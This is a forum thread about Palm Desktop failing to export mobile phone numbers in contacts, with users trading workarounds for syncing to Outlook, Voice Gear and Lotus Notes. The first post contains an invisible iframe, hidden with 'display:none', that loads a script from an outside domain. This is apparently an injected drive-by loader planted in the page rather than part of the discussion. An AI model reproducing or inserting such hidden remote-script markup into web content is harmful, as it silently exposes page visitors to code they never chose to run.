+ Reply to Thread

Palm Desktop doesn't Export Mobile Numbers in Contacts???

I am trying to export my contacts from the Palm Desktop so I can put them in Voice Gear. For some reason, the "mobile" contact field isn't showing as something you can export into a .csv file. Does anybody know what to do with this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ---------------
    The same thing we do every night, Pinky...

I think what it does is that there are five fields, which you can specify to be work, home, email, mobile, etc. in your records, but when it goes to export them, it just calls the five places by the first five possibilities. If you've put a number in there, and labelled it as mobile, it should export the data, but in whatever position it's in (like, the fourth contact possibility for that person). Depending on what you are then importing into, you may have to do some cleaning up of the number types to make sure it's clear it's the mobile number. I've never used Voice Gear, but when I imported into my StarTac, I had to re-label some things that had been in the "wrong" order to be mobile, fax, etc.

Thanks. At least the data backup files save the information correctly. I'll have to play around with exporting some information to see if I can get it right.
    ---------------

This is just beatiful. I was getting some weird results from exporting from Desktop (particularly when trying to send it to Outlook Express), so I installed the Outlook conduit, had the handheld overwrite Outlook Contacts, and then exported that to Verizon Voice Gear.

Tonight I uninstalled Chapura so that my phone would quit syncing with Outlook, and it says I have to reinstall Desktop if I want to be able to sync up with it again. I am quickly becoming non-enamoured of Palm Desktop, no matter how annoying Outlook is.
    ---------------

Solution?

I know this thread was a long time ago but I have had this problem ALOT. Finally gave up syncing to Act! because of it and still it seems to be an issue.

How to avoid this problem??

Curious on this (but too lazy to reinstall everything) also. Before I go through the effort, want to know from anyones experience if this will fix the problem. I've been using XTND Connect to synch my Lotus Notes Contacts (only using LN to track this stuff). Each time, the export puts mobile numbers into the Other category (Other: Mobile xxx-xxx-xxxx) which of course makes it so you can't dial w/ one button. I looked at my Palm default settings, and found that Mobile wasn't one of my default labels in the Palm Address book.

Problem is, even after I've changed it now in the defaults, its still mapping that way (because at this point, XTND doesn't go back to the Palm Desktop).

I'm thinking I have to 1) backup my data 2) uninstall the palm desktop and XTND Connect 3) Reinstall the palm desktop & change the default to include mobile 4) reinstall XTND connect & check the mapping (although it looks fine now!), and 5) re synch all of my data.

Anyone had this problem or tried this with any success??

Thanks! t